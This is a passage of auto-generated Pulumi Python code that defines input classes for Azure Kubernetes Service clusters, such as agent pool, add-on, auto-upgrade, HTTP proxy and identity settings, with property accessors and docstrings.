        return pulumi.get(self, "enable_private_cluster")

    @enable_private_cluster.setter
    def enable_private_cluster(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enable_private_cluster", value)

    @property
    @pulumi.getter(name="privateDNSZone")
    def private_dns_zone(self) -> Optional[pulumi.Input[str]]:
        """
        Private dns zone mode for private cluster.
        """
        return pulumi.get(self, "private_dns_zone")

    @private_dns_zone.setter
    def private_dns_zone(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "private_dns_zone", value)
@pulumi.input_type
class ManagedClusterAddonProfileArgs:
    def __init__(__self__, *,
                 enabled: pulumi.Input[bool],
                 config: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
        """
        A Kubernetes add-on profile for a managed cluster.
        :param pulumi.Input[bool] enabled: Whether the add-on is enabled or not.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] config: Key-value pairs for configuring an add-on.
        """
        # `enabled` is required and always stored; `config` is stored only
        # when the caller supplied one.
        pulumi.set(__self__, "enabled", enabled)
        if config is None:
            return
        pulumi.set(__self__, "config", config)

    @property
    @pulumi.getter
    def enabled(self) -> pulumi.Input[bool]:
        """
        Whether the add-on is enabled or not.
        """
        return pulumi.get(self, "enabled")

    @enabled.setter
    def enabled(self, value: pulumi.Input[bool]):
        pulumi.set(self, "enabled", value)

    @property
    @pulumi.getter
    def config(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        Key-value pairs for configuring an add-on.
        """
        return pulumi.get(self, "config")

    @config.setter
    def config(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "config", value)
@pulumi.input_type
class ManagedClusterAgentPoolProfileArgs:
    # Auto-generated Pulumi input type describing one AKS agent (node) pool.
    # @pulumi.input_type introspects the accessor layout below; do not edit
    # the structure by hand.
    def __init__(__self__, *,
                 name: pulumi.Input[str],
                 availability_zones: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 count: Optional[pulumi.Input[int]] = None,
                 enable_auto_scaling: Optional[pulumi.Input[bool]] = None,
                 enable_encryption_at_host: Optional[pulumi.Input[bool]] = None,
                 enable_fips: Optional[pulumi.Input[bool]] = None,
                 enable_node_public_ip: Optional[pulumi.Input[bool]] = None,
                 gpu_instance_profile: Optional[pulumi.Input[Union[str, 'GPUInstanceProfile']]] = None,
                 kubelet_config: Optional[pulumi.Input['KubeletConfigArgs']] = None,
                 kubelet_disk_type: Optional[pulumi.Input[Union[str, 'KubeletDiskType']]] = None,
                 linux_os_config: Optional[pulumi.Input['LinuxOSConfigArgs']] = None,
                 max_count: Optional[pulumi.Input[int]] = None,
                 max_pods: Optional[pulumi.Input[int]] = None,
                 min_count: Optional[pulumi.Input[int]] = None,
                 mode: Optional[pulumi.Input[Union[str, 'AgentPoolMode']]] = None,
                 node_labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 node_public_ip_prefix_id: Optional[pulumi.Input[str]] = None,
                 node_taints: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 orchestrator_version: Optional[pulumi.Input[str]] = None,
                 os_disk_size_gb: Optional[pulumi.Input[int]] = None,
                 os_disk_type: Optional[pulumi.Input[Union[str, 'OSDiskType']]] = None,
                 os_sku: Optional[pulumi.Input[Union[str, 'OSSKU']]] = None,
                 os_type: Optional[pulumi.Input[Union[str, 'OSType']]] = None,
                 pod_subnet_id: Optional[pulumi.Input[str]] = None,
                 proximity_placement_group_id: Optional[pulumi.Input[str]] = None,
                 scale_set_eviction_policy: Optional[pulumi.Input[Union[str, 'ScaleSetEvictionPolicy']]] = None,
                 scale_set_priority: Optional[pulumi.Input[Union[str, 'ScaleSetPriority']]] = None,
                 spot_max_price: Optional[pulumi.Input[float]] = None,
                 tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 type: Optional[pulumi.Input[Union[str, 'AgentPoolType']]] = None,
                 upgrade_settings: Optional[pulumi.Input['AgentPoolUpgradeSettingsArgs']] = None,
                 vm_size: Optional[pulumi.Input[str]] = None,
                 vnet_subnet_id: Optional[pulumi.Input[str]] = None):
        """
        Profile for the container service agent pool.
        :param pulumi.Input[str] name: Unique name of the agent pool profile in the context of the subscription and resource group.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] availability_zones: Availability zones for nodes. Must use VirtualMachineScaleSets AgentPoolType.
        :param pulumi.Input[int] count: Number of agents (VMs) to host docker containers. Allowed values must be in the range of 0 to 100 (inclusive) for user pools and in the range of 1 to 100 (inclusive) for system pools. The default value is 1.
        :param pulumi.Input[bool] enable_auto_scaling: Whether to enable auto-scaler
        :param pulumi.Input[bool] enable_encryption_at_host: Whether to enable EncryptionAtHost
        :param pulumi.Input[bool] enable_fips: Whether to use FIPS enabled OS
        :param pulumi.Input[bool] enable_node_public_ip: Enable public IP for nodes
        :param pulumi.Input[Union[str, 'GPUInstanceProfile']] gpu_instance_profile: GPUInstanceProfile to be used to specify GPU MIG instance profile for supported GPU VM SKU. Supported values are MIG1g, MIG2g, MIG3g, MIG4g and MIG7g.
        :param pulumi.Input['KubeletConfigArgs'] kubelet_config: KubeletConfig specifies the configuration of kubelet on agent nodes.
        :param pulumi.Input[Union[str, 'KubeletDiskType']] kubelet_disk_type: KubeletDiskType determines the placement of emptyDir volumes, container runtime data root, and Kubelet ephemeral storage. Currently allows one value, OS, resulting in Kubelet using the OS disk for data.
        :param pulumi.Input['LinuxOSConfigArgs'] linux_os_config: LinuxOSConfig specifies the OS configuration of linux agent nodes.
        :param pulumi.Input[int] max_count: Maximum number of nodes for auto-scaling
        :param pulumi.Input[int] max_pods: Maximum number of pods that can run on a node.
        :param pulumi.Input[int] min_count: Minimum number of nodes for auto-scaling
        :param pulumi.Input[Union[str, 'AgentPoolMode']] mode: AgentPoolMode represents mode of an agent pool
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] node_labels: Agent pool node labels to be persisted across all nodes in agent pool.
        :param pulumi.Input[str] node_public_ip_prefix_id: Public IP Prefix ID. VM nodes use IPs assigned from this Public IP Prefix.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] node_taints: Taints added to new nodes during node pool create and scale. For example, key=value:NoSchedule.
        :param pulumi.Input[str] orchestrator_version: Version of orchestrator specified when creating the managed cluster.
        :param pulumi.Input[int] os_disk_size_gb: OS Disk Size in GB to be used to specify the disk size for every machine in this master/agent pool. If you specify 0, it will apply the default osDisk size according to the vmSize specified.
        :param pulumi.Input[Union[str, 'OSDiskType']] os_disk_type: OS disk type to be used for machines in a given agent pool. Allowed values are 'Ephemeral' and 'Managed'. If unspecified, defaults to 'Ephemeral' when the VM supports ephemeral OS and has a cache disk larger than the requested OSDiskSizeGB. Otherwise, defaults to 'Managed'. May not be changed after creation.
        :param pulumi.Input[Union[str, 'OSSKU']] os_sku: OsSKU to be used to specify os sku. Choose from Ubuntu(default) and CBLMariner for Linux OSType. Not applicable to Windows OSType.
        :param pulumi.Input[Union[str, 'OSType']] os_type: OsType to be used to specify os type. Choose from Linux and Windows. Default to Linux.
        :param pulumi.Input[str] pod_subnet_id: Pod SubnetID specifies the VNet's subnet identifier for pods.
        :param pulumi.Input[str] proximity_placement_group_id: The ID for Proximity Placement Group.
        :param pulumi.Input[Union[str, 'ScaleSetEvictionPolicy']] scale_set_eviction_policy: ScaleSetEvictionPolicy to be used to specify eviction policy for Spot virtual machine scale set. Default to Delete.
        :param pulumi.Input[Union[str, 'ScaleSetPriority']] scale_set_priority: ScaleSetPriority to be used to specify virtual machine scale set priority. Default to regular.
        :param pulumi.Input[float] spot_max_price: SpotMaxPrice to be used to specify the maximum price you are willing to pay in US Dollars. Possible values are any decimal value greater than zero or -1 which indicates default price to be up-to on-demand.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Agent pool tags to be persisted on the agent pool virtual machine scale set.
        :param pulumi.Input[Union[str, 'AgentPoolType']] type: AgentPoolType represents types of an agent pool
        :param pulumi.Input['AgentPoolUpgradeSettingsArgs'] upgrade_settings: Settings for upgrading the agentpool
        :param pulumi.Input[str] vm_size: Size of agent VMs.
        :param pulumi.Input[str] vnet_subnet_id: VNet SubnetID specifies the VNet's subnet identifier for nodes and maybe pods
        """
        # ``name`` is the only required argument; every optional argument is
        # recorded only when explicitly supplied by the caller.
        pulumi.set(__self__, "name", name)
        if availability_zones is not None:
            pulumi.set(__self__, "availability_zones", availability_zones)
        if count is not None:
            pulumi.set(__self__, "count", count)
        if enable_auto_scaling is not None:
            pulumi.set(__self__, "enable_auto_scaling", enable_auto_scaling)
        if enable_encryption_at_host is not None:
            pulumi.set(__self__, "enable_encryption_at_host", enable_encryption_at_host)
        if enable_fips is not None:
            pulumi.set(__self__, "enable_fips", enable_fips)
        if enable_node_public_ip is not None:
            pulumi.set(__self__, "enable_node_public_ip", enable_node_public_ip)
        if gpu_instance_profile is not None:
            pulumi.set(__self__, "gpu_instance_profile", gpu_instance_profile)
        if kubelet_config is not None:
            pulumi.set(__self__, "kubelet_config", kubelet_config)
        if kubelet_disk_type is not None:
            pulumi.set(__self__, "kubelet_disk_type", kubelet_disk_type)
        if linux_os_config is not None:
            pulumi.set(__self__, "linux_os_config", linux_os_config)
        if max_count is not None:
            pulumi.set(__self__, "max_count", max_count)
        if max_pods is not None:
            pulumi.set(__self__, "max_pods", max_pods)
        if min_count is not None:
            pulumi.set(__self__, "min_count", min_count)
        if mode is not None:
            pulumi.set(__self__, "mode", mode)
        if node_labels is not None:
            pulumi.set(__self__, "node_labels", node_labels)
        if node_public_ip_prefix_id is not None:
            pulumi.set(__self__, "node_public_ip_prefix_id", node_public_ip_prefix_id)
        if node_taints is not None:
            pulumi.set(__self__, "node_taints", node_taints)
        if orchestrator_version is not None:
            pulumi.set(__self__, "orchestrator_version", orchestrator_version)
        if os_disk_size_gb is not None:
            pulumi.set(__self__, "os_disk_size_gb", os_disk_size_gb)
        if os_disk_type is not None:
            pulumi.set(__self__, "os_disk_type", os_disk_type)
        if os_sku is not None:
            pulumi.set(__self__, "os_sku", os_sku)
        if os_type is not None:
            pulumi.set(__self__, "os_type", os_type)
        if pod_subnet_id is not None:
            pulumi.set(__self__, "pod_subnet_id", pod_subnet_id)
        if proximity_placement_group_id is not None:
            pulumi.set(__self__, "proximity_placement_group_id", proximity_placement_group_id)
        if scale_set_eviction_policy is not None:
            pulumi.set(__self__, "scale_set_eviction_policy", scale_set_eviction_policy)
        if scale_set_priority is not None:
            pulumi.set(__self__, "scale_set_priority", scale_set_priority)
        if spot_max_price is not None:
            pulumi.set(__self__, "spot_max_price", spot_max_price)
        if tags is not None:
            pulumi.set(__self__, "tags", tags)
        if type is not None:
            pulumi.set(__self__, "type", type)
        if upgrade_settings is not None:
            pulumi.set(__self__, "upgrade_settings", upgrade_settings)
        if vm_size is not None:
            pulumi.set(__self__, "vm_size", vm_size)
        if vnet_subnet_id is not None:
            pulumi.set(__self__, "vnet_subnet_id", vnet_subnet_id)
    # Each property below is a thin pulumi.get/pulumi.set accessor pair; where
    # present, @pulumi.getter(name=...) maps the snake_case Python name to its
    # camelCase wire name.
    @property
    @pulumi.getter
    def name(self) -> pulumi.Input[str]:
        """
        Unique name of the agent pool profile in the context of the subscription and resource group.
        """
        return pulumi.get(self, "name")
    @name.setter
    def name(self, value: pulumi.Input[str]):
        pulumi.set(self, "name", value)
    @property
    @pulumi.getter(name="availabilityZones")
    def availability_zones(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        Availability zones for nodes. Must use VirtualMachineScaleSets AgentPoolType.
        """
        return pulumi.get(self, "availability_zones")
    @availability_zones.setter
    def availability_zones(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "availability_zones", value)
    @property
    @pulumi.getter
    def count(self) -> Optional[pulumi.Input[int]]:
        """
        Number of agents (VMs) to host docker containers. Allowed values must be in the range of 0 to 100 (inclusive) for user pools and in the range of 1 to 100 (inclusive) for system pools. The default value is 1.
        """
        return pulumi.get(self, "count")
    @count.setter
    def count(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "count", value)
    @property
    @pulumi.getter(name="enableAutoScaling")
    def enable_auto_scaling(self) -> Optional[pulumi.Input[bool]]:
        """
        Whether to enable auto-scaler
        """
        return pulumi.get(self, "enable_auto_scaling")
    @enable_auto_scaling.setter
    def enable_auto_scaling(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enable_auto_scaling", value)
    @property
    @pulumi.getter(name="enableEncryptionAtHost")
    def enable_encryption_at_host(self) -> Optional[pulumi.Input[bool]]:
        """
        Whether to enable EncryptionAtHost
        """
        return pulumi.get(self, "enable_encryption_at_host")
    @enable_encryption_at_host.setter
    def enable_encryption_at_host(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enable_encryption_at_host", value)
    @property
    @pulumi.getter(name="enableFIPS")
    def enable_fips(self) -> Optional[pulumi.Input[bool]]:
        """
        Whether to use FIPS enabled OS
        """
        return pulumi.get(self, "enable_fips")
    @enable_fips.setter
    def enable_fips(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enable_fips", value)
    @property
    @pulumi.getter(name="enableNodePublicIP")
    def enable_node_public_ip(self) -> Optional[pulumi.Input[bool]]:
        """
        Enable public IP for nodes
        """
        return pulumi.get(self, "enable_node_public_ip")
    @enable_node_public_ip.setter
    def enable_node_public_ip(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enable_node_public_ip", value)
    @property
    @pulumi.getter(name="gpuInstanceProfile")
    def gpu_instance_profile(self) -> Optional[pulumi.Input[Union[str, 'GPUInstanceProfile']]]:
        """
        GPUInstanceProfile to be used to specify GPU MIG instance profile for supported GPU VM SKU. Supported values are MIG1g, MIG2g, MIG3g, MIG4g and MIG7g.
        """
        return pulumi.get(self, "gpu_instance_profile")
    @gpu_instance_profile.setter
    def gpu_instance_profile(self, value: Optional[pulumi.Input[Union[str, 'GPUInstanceProfile']]]):
        pulumi.set(self, "gpu_instance_profile", value)
    @property
    @pulumi.getter(name="kubeletConfig")
    def kubelet_config(self) -> Optional[pulumi.Input['KubeletConfigArgs']]:
        """
        KubeletConfig specifies the configuration of kubelet on agent nodes.
        """
        return pulumi.get(self, "kubelet_config")
    @kubelet_config.setter
    def kubelet_config(self, value: Optional[pulumi.Input['KubeletConfigArgs']]):
        pulumi.set(self, "kubelet_config", value)
    @property
    @pulumi.getter(name="kubeletDiskType")
    def kubelet_disk_type(self) -> Optional[pulumi.Input[Union[str, 'KubeletDiskType']]]:
        """
        KubeletDiskType determines the placement of emptyDir volumes, container runtime data root, and Kubelet ephemeral storage. Currently allows one value, OS, resulting in Kubelet using the OS disk for data.
        """
        return pulumi.get(self, "kubelet_disk_type")
    @kubelet_disk_type.setter
    def kubelet_disk_type(self, value: Optional[pulumi.Input[Union[str, 'KubeletDiskType']]]):
        pulumi.set(self, "kubelet_disk_type", value)
    @property
    @pulumi.getter(name="linuxOSConfig")
    def linux_os_config(self) -> Optional[pulumi.Input['LinuxOSConfigArgs']]:
        """
        LinuxOSConfig specifies the OS configuration of linux agent nodes.
        """
        return pulumi.get(self, "linux_os_config")
    @linux_os_config.setter
    def linux_os_config(self, value: Optional[pulumi.Input['LinuxOSConfigArgs']]):
        pulumi.set(self, "linux_os_config", value)
    @property
    @pulumi.getter(name="maxCount")
    def max_count(self) -> Optional[pulumi.Input[int]]:
        """
        Maximum number of nodes for auto-scaling
        """
        return pulumi.get(self, "max_count")
    @max_count.setter
    def max_count(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "max_count", value)
    @property
    @pulumi.getter(name="maxPods")
    def max_pods(self) -> Optional[pulumi.Input[int]]:
        """
        Maximum number of pods that can run on a node.
        """
        return pulumi.get(self, "max_pods")
    @max_pods.setter
    def max_pods(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "max_pods", value)
    @property
    @pulumi.getter(name="minCount")
    def min_count(self) -> Optional[pulumi.Input[int]]:
        """
        Minimum number of nodes for auto-scaling
        """
        return pulumi.get(self, "min_count")
    @min_count.setter
    def min_count(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "min_count", value)
    @property
    @pulumi.getter
    def mode(self) -> Optional[pulumi.Input[Union[str, 'AgentPoolMode']]]:
        """
        AgentPoolMode represents mode of an agent pool
        """
        return pulumi.get(self, "mode")
    @mode.setter
    def mode(self, value: Optional[pulumi.Input[Union[str, 'AgentPoolMode']]]):
        pulumi.set(self, "mode", value)
    @property
    @pulumi.getter(name="nodeLabels")
    def node_labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        Agent pool node labels to be persisted across all nodes in agent pool.
        """
        return pulumi.get(self, "node_labels")
    @node_labels.setter
    def node_labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "node_labels", value)
    @property
    @pulumi.getter(name="nodePublicIPPrefixID")
    def node_public_ip_prefix_id(self) -> Optional[pulumi.Input[str]]:
        """
        Public IP Prefix ID. VM nodes use IPs assigned from this Public IP Prefix.
        """
        return pulumi.get(self, "node_public_ip_prefix_id")
    @node_public_ip_prefix_id.setter
    def node_public_ip_prefix_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "node_public_ip_prefix_id", value)
    @property
    @pulumi.getter(name="nodeTaints")
    def node_taints(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        Taints added to new nodes during node pool create and scale. For example, key=value:NoSchedule.
        """
        return pulumi.get(self, "node_taints")
    @node_taints.setter
    def node_taints(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "node_taints", value)
    @property
    @pulumi.getter(name="orchestratorVersion")
    def orchestrator_version(self) -> Optional[pulumi.Input[str]]:
        """
        Version of orchestrator specified when creating the managed cluster.
        """
        return pulumi.get(self, "orchestrator_version")
    @orchestrator_version.setter
    def orchestrator_version(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "orchestrator_version", value)
    @property
    @pulumi.getter(name="osDiskSizeGB")
    def os_disk_size_gb(self) -> Optional[pulumi.Input[int]]:
        """
        OS Disk Size in GB to be used to specify the disk size for every machine in this master/agent pool. If you specify 0, it will apply the default osDisk size according to the vmSize specified.
        """
        return pulumi.get(self, "os_disk_size_gb")
    @os_disk_size_gb.setter
    def os_disk_size_gb(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "os_disk_size_gb", value)
    @property
    @pulumi.getter(name="osDiskType")
    def os_disk_type(self) -> Optional[pulumi.Input[Union[str, 'OSDiskType']]]:
        """
        OS disk type to be used for machines in a given agent pool. Allowed values are 'Ephemeral' and 'Managed'. If unspecified, defaults to 'Ephemeral' when the VM supports ephemeral OS and has a cache disk larger than the requested OSDiskSizeGB. Otherwise, defaults to 'Managed'. May not be changed after creation.
        """
        return pulumi.get(self, "os_disk_type")
    @os_disk_type.setter
    def os_disk_type(self, value: Optional[pulumi.Input[Union[str, 'OSDiskType']]]):
        pulumi.set(self, "os_disk_type", value)
    @property
    @pulumi.getter(name="osSKU")
    def os_sku(self) -> Optional[pulumi.Input[Union[str, 'OSSKU']]]:
        """
        OsSKU to be used to specify os sku. Choose from Ubuntu(default) and CBLMariner for Linux OSType. Not applicable to Windows OSType.
        """
        return pulumi.get(self, "os_sku")
    @os_sku.setter
    def os_sku(self, value: Optional[pulumi.Input[Union[str, 'OSSKU']]]):
        pulumi.set(self, "os_sku", value)
    @property
    @pulumi.getter(name="osType")
    def os_type(self) -> Optional[pulumi.Input[Union[str, 'OSType']]]:
        """
        OsType to be used to specify os type. Choose from Linux and Windows. Default to Linux.
        """
        return pulumi.get(self, "os_type")
    @os_type.setter
    def os_type(self, value: Optional[pulumi.Input[Union[str, 'OSType']]]):
        pulumi.set(self, "os_type", value)
    @property
    @pulumi.getter(name="podSubnetID")
    def pod_subnet_id(self) -> Optional[pulumi.Input[str]]:
        """
        Pod SubnetID specifies the VNet's subnet identifier for pods.
        """
        return pulumi.get(self, "pod_subnet_id")
    @pod_subnet_id.setter
    def pod_subnet_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "pod_subnet_id", value)
    @property
    @pulumi.getter(name="proximityPlacementGroupID")
    def proximity_placement_group_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID for Proximity Placement Group.
        """
        return pulumi.get(self, "proximity_placement_group_id")
    @proximity_placement_group_id.setter
    def proximity_placement_group_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "proximity_placement_group_id", value)
    @property
    @pulumi.getter(name="scaleSetEvictionPolicy")
    def scale_set_eviction_policy(self) -> Optional[pulumi.Input[Union[str, 'ScaleSetEvictionPolicy']]]:
        """
        ScaleSetEvictionPolicy to be used to specify eviction policy for Spot virtual machine scale set. Default to Delete.
        """
        return pulumi.get(self, "scale_set_eviction_policy")
    @scale_set_eviction_policy.setter
    def scale_set_eviction_policy(self, value: Optional[pulumi.Input[Union[str, 'ScaleSetEvictionPolicy']]]):
        pulumi.set(self, "scale_set_eviction_policy", value)
    @property
    @pulumi.getter(name="scaleSetPriority")
    def scale_set_priority(self) -> Optional[pulumi.Input[Union[str, 'ScaleSetPriority']]]:
        """
        ScaleSetPriority to be used to specify virtual machine scale set priority. Default to regular.
        """
        return pulumi.get(self, "scale_set_priority")
    @scale_set_priority.setter
    def scale_set_priority(self, value: Optional[pulumi.Input[Union[str, 'ScaleSetPriority']]]):
        pulumi.set(self, "scale_set_priority", value)
    @property
    @pulumi.getter(name="spotMaxPrice")
    def spot_max_price(self) -> Optional[pulumi.Input[float]]:
        """
        SpotMaxPrice to be used to specify the maximum price you are willing to pay in US Dollars. Possible values are any decimal value greater than zero or -1 which indicates default price to be up-to on-demand.
        """
        return pulumi.get(self, "spot_max_price")
    @spot_max_price.setter
    def spot_max_price(self, value: Optional[pulumi.Input[float]]):
        pulumi.set(self, "spot_max_price", value)
    @property
    @pulumi.getter
    def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        Agent pool tags to be persisted on the agent pool virtual machine scale set.
        """
        return pulumi.get(self, "tags")
    @tags.setter
    def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "tags", value)
    @property
    @pulumi.getter
    def type(self) -> Optional[pulumi.Input[Union[str, 'AgentPoolType']]]:
        """
        AgentPoolType represents types of an agent pool
        """
        return pulumi.get(self, "type")
    @type.setter
    def type(self, value: Optional[pulumi.Input[Union[str, 'AgentPoolType']]]):
        pulumi.set(self, "type", value)
    @property
    @pulumi.getter(name="upgradeSettings")
    def upgrade_settings(self) -> Optional[pulumi.Input['AgentPoolUpgradeSettingsArgs']]:
        """
        Settings for upgrading the agentpool
        """
        return pulumi.get(self, "upgrade_settings")
    @upgrade_settings.setter
    def upgrade_settings(self, value: Optional[pulumi.Input['AgentPoolUpgradeSettingsArgs']]):
        pulumi.set(self, "upgrade_settings", value)
    @property
    @pulumi.getter(name="vmSize")
    def vm_size(self) -> Optional[pulumi.Input[str]]:
        """
        Size of agent VMs.
        """
        return pulumi.get(self, "vm_size")
    @vm_size.setter
    def vm_size(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "vm_size", value)
    @property
    @pulumi.getter(name="vnetSubnetID")
    def vnet_subnet_id(self) -> Optional[pulumi.Input[str]]:
        """
        VNet SubnetID specifies the VNet's subnet identifier for nodes and maybe pods
        """
        return pulumi.get(self, "vnet_subnet_id")
    @vnet_subnet_id.setter
    def vnet_subnet_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "vnet_subnet_id", value)
@pulumi.input_type
class ManagedClusterAutoUpgradeProfileArgs:
    # Auto-generated Pulumi input type; the accessor layout is introspected by
    # @pulumi.input_type and must not be restructured by hand.
    def __init__(__self__, *,
                 upgrade_channel: Optional[pulumi.Input[Union[str, 'UpgradeChannel']]] = None):
        """
        Auto upgrade profile for a managed cluster.
        :param pulumi.Input[Union[str, 'UpgradeChannel']] upgrade_channel: upgrade channel for auto upgrade.
        """
        # The value is only recorded when explicitly supplied.
        if upgrade_channel is not None:
            pulumi.set(__self__, "upgrade_channel", upgrade_channel)
    @property
    @pulumi.getter(name="upgradeChannel")
    def upgrade_channel(self) -> Optional[pulumi.Input[Union[str, 'UpgradeChannel']]]:
        """
        upgrade channel for auto upgrade.
        """
        return pulumi.get(self, "upgrade_channel")
    @upgrade_channel.setter
    def upgrade_channel(self, value: Optional[pulumi.Input[Union[str, 'UpgradeChannel']]]):
        pulumi.set(self, "upgrade_channel", value)
@pulumi.input_type
class ManagedClusterHTTPProxyConfigArgs:
    # Auto-generated Pulumi input type; the accessor layout is introspected by
    # @pulumi.input_type and must not be restructured by hand.
    def __init__(__self__, *,
                 http_proxy: Optional[pulumi.Input[str]] = None,
                 https_proxy: Optional[pulumi.Input[str]] = None,
                 no_proxy: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 trusted_ca: Optional[pulumi.Input[str]] = None):
        """
        Configurations for provisioning the cluster with HTTP proxy servers.
        :param pulumi.Input[str] http_proxy: HTTP proxy server endpoint to use.
        :param pulumi.Input[str] https_proxy: HTTPS proxy server endpoint to use.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] no_proxy: Endpoints that should not go through proxy.
        :param pulumi.Input[str] trusted_ca: Alternative CA cert to use for connecting to proxy servers.
        """
        # Optional arguments are only recorded when explicitly supplied.
        if http_proxy is not None:
            pulumi.set(__self__, "http_proxy", http_proxy)
        if https_proxy is not None:
            pulumi.set(__self__, "https_proxy", https_proxy)
        if no_proxy is not None:
            pulumi.set(__self__, "no_proxy", no_proxy)
        if trusted_ca is not None:
            pulumi.set(__self__, "trusted_ca", trusted_ca)
    @property
    @pulumi.getter(name="httpProxy")
    def http_proxy(self) -> Optional[pulumi.Input[str]]:
        """
        HTTP proxy server endpoint to use.
        """
        return pulumi.get(self, "http_proxy")
    @http_proxy.setter
    def http_proxy(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "http_proxy", value)
    @property
    @pulumi.getter(name="httpsProxy")
    def https_proxy(self) -> Optional[pulumi.Input[str]]:
        """
        HTTPS proxy server endpoint to use.
        """
        return pulumi.get(self, "https_proxy")
    @https_proxy.setter
    def https_proxy(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "https_proxy", value)
    @property
    @pulumi.getter(name="noProxy")
    def no_proxy(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """
        Endpoints that should not go through proxy.
        """
        return pulumi.get(self, "no_proxy")
    @no_proxy.setter
    def no_proxy(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "no_proxy", value)
    @property
    @pulumi.getter(name="trustedCa")
    def trusted_ca(self) -> Optional[pulumi.Input[str]]:
        """
        Alternative CA cert to use for connecting to proxy servers.
        """
        return pulumi.get(self, "trusted_ca")
    @trusted_ca.setter
    def trusted_ca(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "trusted_ca", value)
@pulumi.input_type
class ManagedClusterIdentityArgs:
    # Auto-generated Pulumi input type; the accessor layout is introspected by
    # @pulumi.input_type and must not be restructured by hand.
    def __init__(__self__, *,
                 type: Optional[pulumi.Input['ResourceIdentityType']] = None,
                 user_assigned_identities: Optional[pulumi.Input[Mapping[str, Any]]] = None):
        """
        Identity for the managed cluster.
        :param pulumi.Input['ResourceIdentityType'] type: The type of identity used for the managed cluster. Type 'SystemAssigned' will use an implicitly created identity in master components and an auto-created user assigned identity in MC_ resource group in agent nodes. Type 'None' will not use MSI for the managed cluster, service principal will be used instead.
        :param pulumi.Input[Mapping[str, Any]] user_assigned_identities: The user identity associated with the managed cluster. This identity will be used in control plane and only one user assigned identity is allowed. The user identity dictionary key references will be ARM resource ids in the form: '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ManagedIdentity/userAssignedIdentities/{identityName}'.
        """
        # Optional arguments are only recorded when explicitly supplied.
        if type is not None:
            pulumi.set(__self__, "type", type)
        if user_assigned_identities is not None:
            pulumi.set(__self__, "user_assigned_identities", user_assigned_identities)
    @property
    @pulumi.getter
    def type(self) -> Optional[pulumi.Input['ResourceIdentityType']]:
        """
        The type of identity used for the managed cluster. Type 'SystemAssigned' will use an implicitly created identity in master components and an auto-created user assigned identity in MC_ resource group in agent nodes. Type 'None' will not use MSI for the managed cluster, service principal will be used instead.
        """
        return pulumi.get(self, "type")
    @type.setter
    def type(self, value: Optional[pulumi.Input['ResourceIdentityType']]):
        pulumi.set(self, "type", value)
    @property
    @pulumi.getter(name="userAssignedIdentities")
    def user_assigned_identities(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
        """
        The user identity associated with the managed cluster. This identity will be used in control plane and only one user assigned identity is allowed. The user identity dictionary key references will be ARM resource ids in the form: '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ManagedIdentity/userAssignedIdentities/{identityName}'.
        """
        return pulumi.get(self, "user_assigned_identities")
    @user_assigned_identities.setter
    def user_assigned_identities(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
        pulumi.set(self, "user_assigned_identities", value)
@pulumi.input_type
class ManagedClusterLoadBalancerProfileManagedOutboundIPsArgs:
    # Auto-generated Pulumi input type; the accessor layout is introspected by
    # @pulumi.input_type and must not be restructured by hand.
    def __init__(__self__, *,
                 count: Optional[pulumi.Input[int]] = None):
        """
        Desired managed outbound IPs for the cluster load balancer.
        :param pulumi.Input[int] count: Desired number of outbound IP created/managed by Azure for the cluster load balancer. Allowed values must be in the range of 1 to 100 (inclusive). The default value is 1.
        """
